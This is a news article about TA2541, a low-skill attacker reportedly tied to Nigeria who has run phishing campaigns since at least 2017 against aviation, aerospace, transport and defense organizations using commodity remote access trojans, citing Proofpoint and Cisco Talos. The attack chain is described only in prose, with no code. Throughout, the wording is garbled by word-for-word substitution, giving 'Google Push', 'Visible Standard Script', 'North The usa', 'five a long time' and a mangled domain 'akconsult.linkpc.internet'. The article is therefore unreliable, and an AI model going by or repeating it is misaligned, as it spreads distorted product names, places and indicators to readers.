Unskilled hacker linked to years of attacks on aviation, transport sectors

For several years, a low-experienced attacker has been making use of off-the-shelf malware in malicious strategies aimed at organizations in the aviation sector as properly as in other sensitive industries.

The menace actor has been lively given that at minimum 2017, concentrating on entities in the aviation, aerospace, transportation, manufacturing, and protection industries.

Tracked as TA2541 by cybersecurity business Proofpoint, the adversary is considered to work from Nigeria and its activity has been documented just before in investigation of separate campaigns.

Non-advanced assaults

In a report nowadays, Proofpoint notes that TA2541 has been reliable about its attack strategy, relying on malicious Microsoft Word paperwork to supply a distant obtain software (RAT).

A typical malware marketing campaign from this team requires sending “hundreds to thousands” of e-mail – generally in English – to “hundreds of organizations globally, with recurring targets in North The usa, Europe, and the Center East.”

Lately, though, the group switched from malicious attachments to linking to a payload hosted in cloud companies these types of as Google Push, Proofpoint scientists say.

TA2541 does not use custom made malware but commodity destructive applications readily available for acquire on cybercriminal community forums. According to the researcher’s observations, AsyncRAT, NetWire, WSH RAT, and Parallax appears to be the group’s leading favorites remaining pushed most frequently in destructive messages.

Proofpoint highlights that all malware utilized in TA2541 campaigns can be made use of to obtain data, but the menace actor’s ultimate aim continues to be unfamiliar at the moment.

A common TA2541 assault chain begins with sending an email that is typically relevant to transportation (e.g. flight, plane, fuel, yacht, constitution, cargo) and provides a malicious document.

“In latest campaigns, Proofpoint observed this group using Google Push URLs in e-mails that direct to an obfuscated Visible Standard Script (VBS) file. If executed, PowerShell pulls an executable from a textual content file hosted on various platforms this kind of as Pastetext, Sharetext, and GitHub” – Proofpoint

In the following stage, the adversary executes PowerShell into several Windows procedures and seems to be for available protection products and solutions by querying the Home windows Management Instrumentation (WMI).

Then it attempts to disable the developed-in defenses and starts accumulating system data in advance of downloading the RAT payload on the compromised host.

Provided TA2541’s decision of targets, its activity has not gone unnoticed and security scientists from other corporations have analyzed its strategies [1, 2, 3] in the earlier, but without connecting all the dots.

Cisco Talos revealed a report past yr about a TA2541 campaign concentrating on the aviation sector with AsyncRAT. The researchers concluded that the actor had been lively for at least 5 decades.

Centered on proof from examining the infrastructure employed in the attack, Cisco Talos was in a position to build a profile for the threat actor, linking its geographic locale to Nigeria.

“While looking into the actor’s actions, applying passive DNS telemetry, we compiled the list of IPs applied by the area akconsult.linkpc.internet. The chart under shows that approximately 73 percent of the IPs had been centered in Nigeria, even further strengthening the theory that the actor in problem is primarily based in Nigeria.” – Cisco Talos

In a solitary marketing campaign, the actor can deliver up to many thousand e-mails to dozens of companies and are not tailor-made for people today with unique roles. This shows that TA2541 is not concerned with the stealth of its steps, even more supporting the concept of a non-proficient actor.

Although hundreds of businesses have been focused in these “spray-and-pray” assaults, corporations across the world in the aviation, aerospace, transportation, production, and protection industries appear to be a consistent focus on.

Even if TA2541’s practices, approaches, and procedures (TTPs) describe an adversary that is not technically advanced, the actor managed to deploy malicious campaigns for more than five a long time devoid of boosting also many flags.